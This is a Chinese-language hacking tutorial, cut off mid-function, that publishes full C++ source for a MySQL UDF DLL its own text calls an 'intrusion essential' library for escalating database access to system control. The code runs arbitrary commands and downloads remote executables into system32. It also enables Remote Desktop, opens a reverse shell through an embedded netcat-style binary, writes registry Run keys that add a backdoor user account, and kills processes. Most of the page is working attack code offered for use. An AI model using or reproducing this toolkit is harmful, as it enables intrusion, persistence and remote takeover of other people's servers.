快捷導(dǎo)航

Mysql提權(quán)方法利用

更新時(shí)間：2007年06月06日 00:00:00 作者：

mysql是一個(gè)常用的數(shù)據(jù)庫系統(tǒng),應(yīng)用極廣泛,如果得到一個(gè)mysql的用戶權(quán)限,如果提升呢,下面這個(gè)思路很先進(jìn)! 但得有一定編程基礎(chǔ)!

現(xiàn)在網(wǎng)上通過mysql獲得系統(tǒng)權(quán)限大都通過MYSQL的用戶函數(shù)接口UDF，比如Mix.dll和my_udf.dll。在Mix.dll中有一個(gè)MixConnect函數(shù)它會(huì)反彈shell，但是使用這個(gè)函數(shù)會(huì)造成MYSQL假死，前些天我就用這個(gè)函數(shù)反彈shell后由于網(wǎng)絡(luò)原因不一會(huì)兒就斷開了，造成了MYSQL當(dāng)?shù)簟y_udf.dll和Mix.dll相似，但它是通過my_udfdoor函數(shù)在服務(wù)器上偵聽3306端口，用nc正向連接獲得shell，但它的功能顯的少了點(diǎn)，于是我決定自己寫一個(gè)功能強(qiáng)大，運(yùn)行穩(wěn)定的UDF。
  MYSQL有一個(gè)開發(fā)包，它定義了自己的接口，變量類型，以及函數(shù)執(zhí)行順序。比如我們要寫一個(gè)open3389函數(shù)，我們可以這樣寫：

程序代碼
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
//在open3389函數(shù)之前調(diào)用，一般用于初始化工作，為可選函數(shù)；
//return 1出錯(cuò) ,0 正常
return 0;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
//真正實(shí)現(xiàn)功能的函數(shù)，必需函數(shù)；
/*
函數(shù)內(nèi)容;
return 結(jié)果;
*/
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
//在open3389函數(shù)之后調(diào)用，一般用于內(nèi)存釋放，可選函數(shù)；
}

 以上的open3389函數(shù)的返回值是char *類型的，如果是其它類型函數(shù)的參數(shù)列表也會(huì)有所不同，具體的可見MYSQL參考手冊。
  在寫MYSQL UDF時(shí)另一個(gè)必須考慮的問題是程序的穩(wěn)定時(shí)，它要經(jīng)的起各種變態(tài)輸入的考驗(yàn)，否則一旦程序出錯(cuò)MYSQL服務(wù)進(jìn)程就會(huì)當(dāng)?shù)簟?nbsp;

以下是我寫的UDF內(nèi)容，它包含10個(gè)函數(shù)：
cmdshell 執(zhí)行cmd；
downloader 下載者,到網(wǎng)上下載指定文件并保存到指定目錄；
open3389 通用開3389終端服務(wù)，可指定端口(不改端口無需重啟)；
backshell 反彈Shell；
ProcessView 枚舉系統(tǒng)進(jìn)程；
KillProcess 終止指定進(jìn)程；
regread 讀注冊表；
regwrite 寫注冊表；
shut 關(guān)機(jī)，注銷，重啟；
about 說明與幫助函數(shù)；

使用方法:
創(chuàng)建函數(shù)：create function 函數(shù)名(區(qū)分大小寫) returns string soname 'dll名' (注意路徑)；
刪除函數(shù)：delete function 函數(shù)名；
使用函數(shù)：select 函數(shù)名(參數(shù)列表)；獲取參數(shù)信息可使用select 函數(shù)名("help")；
以上幾個(gè)函數(shù)都經(jīng)過多次的測試（測試平臺(tái)：MYSQL 5.0.24-community-nt、Windows XP），不太可能會(huì)造成MYSQL假死等現(xiàn)象，但也不排除在特殊環(huán)境，特殊輸入的情況下出錯(cuò)的可能，如發(fā)現(xiàn)bug可通知我，QQ：185826531（langouster）

程序代碼
//--------------------------------------------------------------------------源程序
// MYSQL_UDF.cpp : 定義 DLL 應(yīng)用程序的入口點(diǎn)。
#include "stdafx.h"
#include "stdio.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <winsock.h>
#include <Urlmon.h>
#include "mysql.h"
#include "resource.h"

#pragma comment(lib, "Urlmon.lib")
HANDLE g_module;
//--------------------------------------------------------------------------------------------------------------------------
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
  if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
  return TRUE;
}
//--------------------------------------------------------------------------------------------------------------------------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{

if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"執(zhí)行CMD Shell函數(shù).\r\n例:select cmdshell(\"dir c:\\\\\");\r\n參數(shù)中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}

int RunStatus=0;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];
DWORD size=0,len;
HANDLE hFile;

GetSystemDirectory(ShellPath,MAX_PATH-1);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);
strcat(TempFilePath,"\\2351213.tmp");

cmdline=(char *)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[0]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);

STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);
free(cmdline);

if(!RunStatus)
{
itoa(GetLastError(),temp,10);
sprintf(temp,"Shell無法啟動(dòng),GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+1);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}

WaitForSingleObject(pi.hProcess,30000);

//獲得結(jié)果
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+100);
ReadFile(hFile,initid->ptr,size+1,&len,NULL);
(initid->ptr)[size]='\0';
strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");

CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
}
(*length)=strlen(initid->ptr);
return initid->ptr;

}
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"下載者函數(shù)\r\n例:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n參數(shù)中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}

HANDLE hFile;
char path[MAX_PATH];

strcpy(path,(args->args)[1]);

hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100+strlen(path));
sprintf(initid->ptr,"文件創(chuàng)建失敗,請(qǐng)確認(rèn)目錄存在且有寫權(quán)限(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);

if(URLDownloadToFile(NULL,(args->args)[0],path,0,0)==S_OK)
{
initid->ptr=(char *)malloc(50+strlen(path));
sprintf(initid->ptr,"下載文件成功(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100+strlen((args->args)[0]));
sprintf(initid->ptr,"下載文件出現(xiàn)錯(cuò)誤,可能是網(wǎng)絡(luò)原因(%s).",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}

}
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count==0 ||(args->arg_count==1 && args->arg_type[0]==INT_RESULT)))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"通用開3389終端服務(wù).修改端口需重啟后生效.\r\n例:select open3389([端口]);");
*length=strlen(initid->ptr);
return initid->ptr;
}

HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;

GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\457391.exe");

hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"查找資源出錯(cuò),open3389無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"載入資源出錯(cuò),open3389無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}

hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"創(chuàng)建臨時(shí)文件出錯(cuò),open3389無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);

STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,0,0,0,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"運(yùn)行臨時(shí)文件出錯(cuò),您的權(quán)限可能不夠.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(pi.hProcess,5000);
DeleteFile(path);
//改端口
if(args->arg_count!=0 && args->arg_type[0]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
DWORD port=*((long long *) args->args[0]);

RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"成功開啟3389終端服務(wù)....\r\n成功修改終端服務(wù)端口為%d,重啟后生效,重啟系統(tǒng)可利用WindowsExit函數(shù).",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"成功開啟3389終端服務(wù)....\r\n修改終端服務(wù)端口失敗.");
*length=strlen(initid->ptr);
return initid->ptr;

}
else
{
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"成功開啟3389終端服務(wù).\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=3 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(250);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"讀注冊表函數(shù).\r\n例:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\Services\\\\W3SVC\\\\Parameters\\\\Virtual Roots\",\"/\");\r\n參數(shù)中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}

DWORD a,b,c;
BYTE bytere[1000];
HKEY key,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
sprintf(initid->ptr,"未知的注冊表句柄:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}


RegCreateKeyEx(key,(args->args)[1],0,0,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[2],0,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char *)malloc(1001);
memset(initid->ptr,0,1001);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"找不注冊表值\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"找不注冊表項(xiàng)\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}

}
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=5 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || args->arg_type[3]!=STRING_RESULT || args->arg_type[4]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(300);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"寫注冊表函數(shù).\r\n例:select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"adduser\",\"REG_SZ\",\"cmd.exe /c net user langouster langouster /add\");\r\n參數(shù)中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}

HKEY key,hkey;
DWORD dwDisposition,ktype;

if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
sprintf(initid->ptr,"未知的注冊表句柄:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}

if(strcmp("REG_BINARY",(args->args)[3])==0)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[3])==0)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[3])==0)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[3])==0)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[3])==0)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[3])==0)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[3])==0)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[3])==0)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[3]));
sprintf(initid->ptr,"未知的注冊表值類型:%s\r\n",(args->args)[3]);
*length=strlen(initid->ptr);
return initid->ptr;
}

RegCreateKeyEx(hkey,(args->args)[1],0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[2],0,ktype,(BYTE *)(args->args)[4],lstrlen((args->args)[4])+1))
{
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"寫注冊表成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"寫注冊表失敗，可能是您的權(quán)限不夠\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCloseKey(key);

}
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || (strcmp((args->args)[0],"help")==0))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"結(jié)束進(jìn)程函數(shù).\r\n例:select KillProcess(\"進(jìn)程名或進(jìn)程ID(十進(jìn)制)\");\r\n程序目前還不能結(jié)束系統(tǒng)進(jìn)程.");
*length=strlen(initid->ptr);
return initid->ptr;
}

HANDLE hSnapshot = NULL;
DWORD processid=0;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[10];
PROCESSENTRY32 pe;

strcpy(ProcessName,(args->args)[0]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,10);
if(stricmp(pe.szExeFile,ProcessName)==0 || stricmp(tempchar,ProcessName)==0)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);

if(processid==0)
{
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"找不到進(jìn)程%s,請(qǐng)確認(rèn)進(jìn)程是否存在!",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,0))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"%s進(jìn)程成功終止.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"%s進(jìn)程終止失敗,您的權(quán)限可能不足.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;

}
}
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"枚舉進(jìn)程函數(shù).\r\n例:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}

HANDLE hSnapshot = NULL;
DWORD processid=0;
PROCESSENTRY32 pe;
char tempchar[10];

initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,1000);

hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,pe.szExeFile);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,10);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;

}
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern "C" __declspec(dllexport)my_bool shut_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *shut(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"關(guān)機(jī)重啟注銷函數(shù).\r\n例:select shut(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}

HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"獲得進(jìn)程訪問信令出錯(cuò),您的權(quán)限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
token.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &token.Privileges[0].Luid);
token.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,0,&token, sizeof(token),0,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"獲得關(guān)機(jī)令牌出錯(cuò),您的權(quán)限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
if(stricmp(args->args[0],"logoff")==0)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[0],"shutdown")==0)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[0],"reboot")==0)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(100+strlen(args->args[0]));
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"未知的參數(shù)%s,期望為logoff、shutdown、reboot中的一個(gè).\r\n",args->args[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"成功執(zhí)行.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"執(zhí)行失敗,您的權(quán)限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}

}
extern "C" __declspec(dllexport)void shut_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern "C" __declspec(dllexport)my_bool backshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *backshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=INT_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"反彈shell.\r\n例:select backshell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}

HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[400];
DWORD size,size2;

GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\95315964.tmp");

hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"查找資源出錯(cuò),backshell無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"載入資源出錯(cuò),backshell無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}

hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"創(chuàng)建臨時(shí)文件出錯(cuò),backshell無法繼續(xù)運(yùn)行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-1);
strcat(path,"\\cmd.exe");
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[0],*((long long *) args->args[1]));
if(WinExec(cmd,SW_HIDE)>31)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"執(zhí)行成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"執(zhí)行失敗\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void backshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出錯(cuò) ,0 正常
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,2000);
strcat(initid->ptr,"mysql 入侵必備dll 版本1.0.0.1\r\n\r\n");
strcat(initid->ptr,"注意:要使用本dll你必須有對(duì)mysql的insert和delete權(quán)限以創(chuàng)建和刪除函數(shù)。\r\n\r\n");
strcat(initid->ptr,"使用方法:\r\n");
strcat(initid->ptr,"創(chuàng)建函數(shù):create function 函數(shù)名(區(qū)分大小寫) returns string soname \"dll名\" (注意路徑);\r\n");
strcat(initid->ptr,"刪除函數(shù):delete function 函數(shù)名;\r\n");
